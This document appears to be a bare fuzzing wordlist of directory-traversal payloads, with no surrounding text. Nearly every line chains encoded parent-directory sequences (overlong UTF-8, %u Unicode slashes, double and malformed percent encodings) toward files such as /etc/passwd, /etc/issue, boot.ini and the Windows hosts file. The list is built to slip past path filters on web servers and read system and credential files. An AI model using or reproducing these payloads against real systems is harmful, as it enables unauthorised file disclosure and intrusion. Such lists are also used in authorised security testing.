-%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8sboot.ini -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8sboot.ini -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8sboot.ini -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8spasswd -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8setc%c1%8sissue -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8sboot.ini -%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8s%c0%fe%c0%fe%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cpasswd -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cetc%c1%1cissue -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cboot.ini -%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1c%c0%fe%c0%fe%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afpasswd -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afetc%c1%afissue -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afboot.ini -%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%af%c0%fe%c0%fe%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfpasswd -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfetc%bg%qfissue -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfboot.ini -%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qf%c0%fe%c0%fe%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215passwd -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215etc%u2215issue -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215boot.ini -%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215%c0%fe%c0%fe%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216passwd -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216etc%u2216issue -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216boot.ini -%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216%c0%fe%c0%fe%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8passwd -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8etc%uEFC8issue -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8boot.ini -%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8%c0%fe%c0%fe%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025passwd -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025etc%uF025issue -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025boot.ini -%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025%c0%fe%c0%fe%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%fe%c0%fe%%32%%66etc%%32%%66passwd -%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66passwd -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66passwd -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66issue -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66boot.ini -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66%c0%fe%c0%fe%%32%%66etc%%32%%66passwd 